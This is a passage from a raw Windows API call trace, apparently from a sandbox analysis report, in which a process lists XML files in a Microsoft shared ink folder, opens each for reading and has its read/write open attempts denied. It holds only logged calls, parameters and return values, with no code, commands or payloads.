shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.326] GetLastError () returned 0x5 [0083.326] GetLastError () returned 0x5 [0083.326] SetLastError (dwErrCode=0x5) [0083.326] GetLastError () returned 0x5 [0083.326] SetLastError (dwErrCode=0x5) [0083.326] GetLastError () returned 0x5 [0083.326] SetLastError (dwErrCode=0x5) [0083.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81580 | out: hHeap=0x20000) returned 1 [0083.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0083.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0083.326] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.326] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.326] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xdc9, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="base_ca.xml", cAlternateFileName="")) returned 1 [0083.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0083.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0083.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0083.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81638 [0083.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.327] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.327] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.327] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.327] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81638 | out: hHeap=0x20000) returned 1 [0083.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.327] AreFileApisANSI () returned 1 [0083.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml", lpUsedDefaultChar=0x0) returned 82 [0083.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0083.327] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.327] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0083.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.328] AreFileApisANSI () returned 1 [0083.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0083.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x60138 [0083.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x60138, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 82 [0083.328] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.328] GetFileType (hFile=0x340) returned 0x1 [0083.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0083.328] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.328] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.328] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.329] CloseHandle (hObject=0x340) returned 1 [0083.329] AreFileApisANSI () returned 1 [0083.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0083.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5fd18 [0083.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x5fd18, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 82 [0083.329] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.329] GetLastError () returned 0x5 [0083.329] GetLastError () returned 0x5 [0083.329] SetLastError (dwErrCode=0x5) [0083.329] GetLastError () returned 0x5 [0083.329] SetLastError (dwErrCode=0x5) [0083.329] GetLastError () returned 0x5 [0083.329] SetLastError (dwErrCode=0x5) [0083.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0083.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0083.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0083.329] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.329] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.329] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2e2, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="base_heb.xml", cAlternateFileName="")) returned 1 [0083.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0083.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a8c0 [0083.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0083.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81130 [0083.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81130 | out: hHeap=0x20000) returned 1 [0083.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.330] AreFileApisANSI () returned 1 [0083.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml", lpUsedDefaultChar=0x0) returned 83 [0083.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0083.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0083.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0083.331] AreFileApisANSI () returned 1 [0083.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71620, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0083.331] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x603f8 [0083.331] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71620, cbMultiByte=-1, lpWideCharStr=0x603f8, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 83 [0083.331] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.474] GetFileType (hFile=0x340) returned 0x1 [0083.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x603f8 | out: hHeap=0x20000) returned 1 [0083.474] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.474] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.475] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.475] CloseHandle (hObject=0x340) returned 1 [0083.475] AreFileApisANSI () returned 1 [0083.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71620, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0083.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0083.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71620, cbMultiByte=-1, lpWideCharStr=0x60088, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 83 [0083.475] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.475] GetLastError () returned 0x5 [0083.475] GetLastError () returned 0x5 [0083.475] SetLastError (dwErrCode=0x5) [0083.475] GetLastError () returned 0x5 [0083.475] SetLastError (dwErrCode=0x5) [0083.475] GetLastError () returned 0x5 [0083.475] SetLastError (dwErrCode=0x5) [0083.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0083.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0083.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0083.476] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.476] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.476] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x324, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="base_jpn.xml", cAlternateFileName="")) returned 1 [0083.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0083.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a9f0 [0083.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0083.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x80fc0 [0083.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.477] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.477] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.477] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.477] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80fc0 | out: hHeap=0x20000) returned 1 [0083.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.477] AreFileApisANSI () returned 1 [0083.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml", lpUsedDefaultChar=0x0) returned 83 [0083.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0083.477] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.477] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0083.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.477] AreFileApisANSI () returned 1 [0083.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0083.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0083.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x5f798, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 83 [0083.477] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.477] GetFileType (hFile=0x340) returned 0x1 [0083.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0083.478] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.478] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.478] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.478] CloseHandle (hObject=0x340) returned 1 [0083.478] AreFileApisANSI () returned 1 [0083.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0083.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60138 [0083.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x60138, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 83 [0083.478] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft 